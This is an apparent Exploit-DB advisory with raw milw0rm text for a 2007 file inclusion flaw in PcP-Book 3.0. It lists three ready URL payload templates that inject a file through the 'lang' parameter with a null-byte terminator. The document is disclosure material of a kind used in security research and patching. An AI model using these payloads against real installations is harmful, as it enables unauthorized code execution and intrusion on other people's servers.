PcP-Book 3.0 Remote File Inclusion Vulnerability

vendor:

PcP-Book

by:

Dj7xpl

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: PcP-Book

Affected Version From: PcP-Book 3.0

Affected Version To: PcP-Book 3.0

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

PcP-Book 3.0 Remote File Inclusion Vulnerability

The PcP-Book 3.0 portal is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by injecting a malicious file in the 'lang' parameter of the affected URLs. This allows the attacker to execute arbitrary code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of PcP-Book or apply the necessary security patches.

Source

Exploit-DB raw data:

                                                          .-""""""""-.                                 
                                                         /   Dj7xpl   \                              
                                                        |              |                                
                                                        |,  .-.  .-.  ,|                                
                                                        | )(_o/  \o_)( |                                     
                                                        |/     /\     \|                                 
                                              (@_       (_     ^^     _)                  
                                         _     ) \_______\__|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In World___________________________________________+
*
*
*       [~] Portal.......:    PcP-Book 3.0
*	[~] Site.........:    http://www.pcp-system.at
*       [~] Down.........:    http://www.ectona.org/download/?id=621&s=info
*	[~] Author.......:    Dj7xpl  | Dj7xpl@yahoo.com
*
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
*
*
*
*       [~] Vuln.........:         http://[Target]/[Path]/index.php?lang=[File-To-Require]%00
*                                  http://[Target]/[Path]/gb.php?lang=[File-To-Require]%00
*                                  http://[Target]/[Path]/faq.php?lang=[File-To-Require]%00
*                             
*		
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-04-08]